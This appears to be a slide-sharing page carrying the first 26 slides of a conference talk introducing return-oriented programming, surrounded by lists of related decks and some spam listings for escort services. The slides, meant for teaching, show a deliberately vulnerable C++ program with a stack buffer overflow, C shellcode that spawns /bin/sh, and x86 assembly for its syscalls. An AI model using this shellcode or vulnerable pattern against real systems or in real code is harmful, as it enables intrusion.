08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen oneAlexandre Moneger
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory AnalysisMoabi.com
 
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camPriyanka Aash
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadachecamsec
 
SFO15-500: VIXL
SFO15-500: VIXLSFO15-500: VIXL
SFO15-500: VIXLLinaro
 
CyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation ProcessCyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation ProcessThomas Gregory
 
Exploit Development: EzServer Buffer Overflow oleh Tom Gregory
Exploit Development: EzServer Buffer Overflow oleh Tom GregoryExploit Development: EzServer Buffer Overflow oleh Tom Gregory
Exploit Development: EzServer Buffer Overflow oleh Tom Gregoryzakiakhmad
 
Exploit Development with Python
Exploit Development with PythonExploit Development with Python
Exploit Development with PythonThomas Gregory
 
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
[2007 CodeEngn Conference 01] seaofglass - Linux Virus AnalysisGangSeok Lee
 
Offensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with PythonOffensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with PythonMalachi Jones
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchFelipe Prado
 
2011-03 Developing Windows Exploits
2011-03 Developing Windows Exploits 2011-03 Developing Windows Exploits
2011-03 Developing Windows Exploits Raleigh ISSA
 
Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)
Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)
Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)Gavin Guo
 

Similar to ROP Shellcode (20)

[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
[ROOTCON13] Pilot Study on Semi-Automated Patch Diffing by Applying Machine-L...
 
Intel DPDK Step by Step instructions
Intel DPDK Step by Step instructionsIntel DPDK Step by Step instructions
Intel DPDK Step by Step instructions
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis
 
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadache
 
SFO15-500: VIXL
SFO15-500: VIXLSFO15-500: VIXL
SFO15-500: VIXL
 
Marat-Slides
Marat-SlidesMarat-Slides
Marat-Slides
 
3
33
3
 
x86 & PE
x86 & PEx86 & PE
x86 & PE
 
CyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation ProcessCyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation Process
 
Exploiting buffer overflows
Exploiting buffer overflowsExploiting buffer overflows
Exploiting buffer overflows
 
Exploit Development: EzServer Buffer Overflow oleh Tom Gregory
Exploit Development: EzServer Buffer Overflow oleh Tom GregoryExploit Development: EzServer Buffer Overflow oleh Tom Gregory
Exploit Development: EzServer Buffer Overflow oleh Tom Gregory
 
Exploit Development with Python
Exploit Development with PythonExploit Development with Python
Exploit Development with Python
 
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
 
Offensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with PythonOffensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with Python
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitch
 
2011-03 Developing Windows Exploits
2011-03 Developing Windows Exploits 2011-03 Developing Windows Exploits
2011-03 Developing Windows Exploits
 
Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)
Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)
Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)
 

More from Patricia Aas

I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)Patricia Aas
 
Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)Patricia Aas
 
Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)Patricia Aas
 
Classic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdfClassic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdfPatricia Aas
 
Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)Patricia Aas
 
Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Patricia Aas
 
Thoughts On Learning A New Programming Language
Thoughts On Learning A New Programming LanguageThoughts On Learning A New Programming Language
Thoughts On Learning A New Programming LanguagePatricia Aas
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Patricia Aas
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Patricia Aas
 
DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)Patricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)Patricia Aas
 
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)Patricia Aas
 
The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))Patricia Aas
 
Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)Patricia Aas
 
Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019) Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019) Patricia Aas
 
Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)Patricia Aas
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
 
Keynote: Deconstructing Privilege (C++ on Sea 2019)
Keynote: Deconstructing Privilege (C++ on Sea 2019)Keynote: Deconstructing Privilege (C++ on Sea 2019)
Keynote: Deconstructing Privilege (C++ on Sea 2019)Patricia Aas
 
The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)Patricia Aas
 

More from Patricia Aas (20)

Telling a story
Telling a storyTelling a story
Telling a story
 
I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)I can't work like this (KDE Academy Keynote 2021)
I can't work like this (KDE Academy Keynote 2021)
 
Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)Dependency Management in C++ (NDC TechTown 2021)
Dependency Management in C++ (NDC TechTown 2021)
 
Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)Introduction to Memory Exploitation (Meeting C++ 2021)
Introduction to Memory Exploitation (Meeting C++ 2021)
 
Classic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdfClassic Vulnerabilities (MUCplusplus2022).pdf
Classic Vulnerabilities (MUCplusplus2022).pdf
 
Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)Classic Vulnerabilities (ACCU Keynote 2022)
Classic Vulnerabilities (ACCU Keynote 2022)
 
Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)Introduction to Memory Exploitation (CppEurope 2021)
Introduction to Memory Exploitation (CppEurope 2021)
 
Thoughts On Learning A New Programming Language
Thoughts On Learning A New Programming LanguageThoughts On Learning A New Programming Language
Thoughts On Learning A New Programming Language
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020
 
Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020Trying to build an Open Source browser in 2020
Trying to build an Open Source browser in 2020
 
DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)DevSecOps for Developers, How To Start (ETC 2020)
DevSecOps for Developers, How To Start (ETC 2020)
 
The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)The Anatomy of an Exploit (NDC TechTown 2019)
The Anatomy of an Exploit (NDC TechTown 2019)
 
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
Elections: Trust and Critical Infrastructure (NDC TechTown 2019)
 
The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))The Anatomy of an Exploit (NDC TechTown 2019))
The Anatomy of an Exploit (NDC TechTown 2019))
 
Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)Elections, Trust and Critical Infrastructure (NDC TechTown)
Elections, Trust and Critical Infrastructure (NDC TechTown)
 
Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019) Survival Tips for Women in Tech (JavaZone 2019)
Survival Tips for Women in Tech (JavaZone 2019)
 
Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)Embedded Ethics (EuroBSDcon 2019)
Embedded Ethics (EuroBSDcon 2019)
 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)
 
Keynote: Deconstructing Privilege (C++ on Sea 2019)
Keynote: Deconstructing Privilege (C++ on Sea 2019)Keynote: Deconstructing Privilege (C++ on Sea 2019)
Keynote: Deconstructing Privilege (C++ on Sea 2019)
 
The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)The Anatomy of an Exploit (CPPP 2019)
The Anatomy of an Exploit (CPPP 2019)
 

Recently uploaded

Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataBradBedford3
 
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfGOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfAlina Yurenko
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...MyIntelliSource, Inc.
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptkotipi9215
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Andreas Granig
 
The Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfThe Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfPower Karaoke
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio, Inc.
 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmSujith Sukumaran
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityNeo4j
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based projectAnoyGreter
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...Christina Lin
 
Folding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesFolding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesPhilip Schwarz
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)OPEN KNOWLEDGE GmbH
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...OnePlan Solutions
 
Cloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEECloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEEVICTOR MAESTRE RAMIREZ
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideChristina Lin
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - InfographicHr365.us smith
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxTier1 app
 

Recently uploaded (20)

Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
 
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfGOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.ppt
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024
 
The Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfThe Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdf
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalm
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered Sustainability
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based project
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
Folding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesFolding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a series
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...
 
Cloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEECloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEE
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - Infographic
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
 

ROP Shellcode

  • 1. 1 Turtle Sec @pati_gallardo Warning! This presentation has A LOT of assembly Run while you have the chance Go watch Ólafur's talk, it's fun and he's basically making malware Too tired for 40 minutes of stepping through assembly?
  • 2. 2 Return Oriented Programming an introduction NDC TechTown2023 Patricia Aas Turtle Sec
  • 3. 3 @pati_gallardo Patricia Aas - Trainer & Consultant C++ Programmer, Application Security Currently : TurtleSec Previously : Vivaldi, Cisco Systems, Knowit, Opera Software Master in Computer Science Pronouns: she/they Turtle Sec
  • 5. 5 TurtleSec @pati_gallardo 1. void launch_missiles(int n) { 2. printf("Launching %d missilesn", n); 3. } 4. 5. void authenticate_and_launch() { 6. int n_missiles = 2; 7. bool allowaccess = false; 8. char response[110]; 9. printf("Secret: "); 10. std::cin >> response; 11. 12. if (strcmp(response, "Joshua") == 0) 13. allowaccess = true; 14. 15. if (allowaccess) { 16. puts("Access granted"); 17. launch_missiles(n_missiles); 18. } 19. 20. if (!allowaccess) 21. puts("Access denied"); 22. } 23. 24. int main() { 25. puts("WarGames MissileLauncher v0.1"); 26. authenticate_and_launch(); 27. puts("Operation complete"); 28. } target.cpp @olvemaudal @pati_gallardo The application
  • 7. 7 TurtleSec @pati_gallardo target.cpp 1. void launch_missiles(int n) { 2. printf("Launching %d missilesn", n); 3. } 4. 5. void authenticate_and_launch() { 6. int n_missiles = 2; 7. bool allowaccess = false; 8. char response[110]; 9. printf("Secret: "); 10. std::cin >> response; 11. 12. if (strcmp(response, "Joshua") == 0) 13. allowaccess = true; 14. 15. if (allowaccess) { 16. puts("Access granted"); 17. launch_missiles(n_missiles); 18. } 19. 20. if (!allowaccess) 21. puts("Access denied"); 22. } 23. 24. int main() { 25. puts("WarGames MissileLauncher v0.1"); 26. authenticate_and_launch(); 27. puts("Operation complete"); 28. } The vulnerability Stack allocated buffer Stack Buffer Overflow @pati_gallardo
  • 9. 9 @pati_gallardo Our x86 32-bit shellcode for Linux
  • 10. 10 TurtleSec @pati_gallardo Shellcode Piece of code, typically in machine code, that is delivered and executed as a part of an exploit. Called “shellcode” because a traditional use was to start a shell, for example sh. In real exploits it will deliver some kind of mechanism for further (remote) compromise of the system.
  • 11. 11 TurtleSec @pati_gallardo Shellcode - code that gives you shell int execve(const char *filename, char *const argv[], char *const envp[]); Target Process Vulnerable Program Target Process /bin/sh Shellcode
  • 12. 12 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
  • 13. 13 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } Write C code for shellcode TurtleSec shellcode.c execve open close
  • 14. 14 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
  • 15. 15 TurtleSec @pati_gallardo $ gcc -Wno-nonnull -Os -m32 -static -o shellcode shellcode.c $ ./shellcode $ Test C code for shellcode
  • 16. 16 TurtleSec @pati_gallardo Write C code for shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
  • 17. 17 TurtleSec @pati_gallardo ebx eax ax ah al 32 16 8 bx bh bl ecx cx ch cl edx dx dh dl x86 32-bit Linux syscall convention eax Syscall number ebx 1. argument ecx 2. argument edx 3. argument Registers
  • 18. 18 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } C code for shellcode TurtleSec shellcode.c close
  • 19. 19 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x06 unsigned int fd close - calling convention 1. int fd = 0; 2. close(fd); Not in use
  • 20. 20 TurtleSec @pati_gallardo eax Syscall number 0x06 ebx 1. argument unsigned int fd close asm 1. "xor eax, eaxnt" // Zero out 2. "mov eax, 0x06nt" // Set eax to syscall number (0x06) 3. "xor ebx, ebxnt" // Zero out ebx - file descriptor 4. "int 0x80nt" // Invoke syscall
  • 21. 21 TurtleSec @pati_gallardo 1. 2. 3. 4. mov eax, 0x06 xor ebx, ebx xor eax, eax eax 0x00 eax 0x06 ebx 0x00 Syscall Registers eax : Syscall number ebx : unsigned int fd int 0x80 close Register State Instructions
  • 22. 22 $ hello TurtleSec 1. #include <fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } C code for shellcode TurtleSec shellcode.c open
  • 23. 23 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x05 const char *filename int flags umode_t mode open - calling convention 1. const char *filename = "/dev/tty"; 2. int flag = O_RDONLY; 3. open(filename, flag);
  • 24. 24 TurtleSec @pati_gallardo esp sp stack pointer 32 16 Stack manipulation As instructions like push and pop are executed the stack pointer register (esp) is updated so it points to the "top of the stack"
  • 25. 25 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2. argument 3. argument 0x05 const char *filename int flags umode_t mode open asm 1. "xor eax, eaxnt" // Zero out 2. "mov eax, 0x05nt" // Set eax to syscall number (0x05) 3. "xor ebx, ebxnt" // Zero out 4. "push ebxnt" // Push null terminator 5. "mov ebx, 0x7974742fnt" // "ytt/" 6. "push ebxnt" // Part two of the string 7. "mov ebx, 0x7665642fnt" // "ved/" 8. "push ebxnt" // Part one of the string 9. "mov ebx, espnt" // Put pointer in ebx 10. "xor ecx, ecxnt" // Zero out 11. "xor edx, edxnt" // Zero out 12. "int 0x80nt" // Invoke syscall
  • 26. 26 TurtleSec @pati_gallardo 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. mov eax, 0x05 xor ebx, ebx push ebx mov ebx, 0x7974742f xor ecx, ecx mov ebx, esp push ebx mov ebx, 0x7665642f push ebx xor edx, edx xor eax, eax 0x00 0x00 0x00 0x00 0x79 y 0x74 t 0x74 t 0x2f / 0x76 v 0x65 e 0x64 d 0x2f / ecx 0x00 eax 0x00 eax 0x05 ebx 0x00000000 Stack Syscall Registers edx : umode_t mode eax : Syscall number ebx : const char *filename ecx : int flags int 0x80 ebx 0x7974742f ebx 0x7665642f ebx = esp ecx 0x00 O_RDONLY open
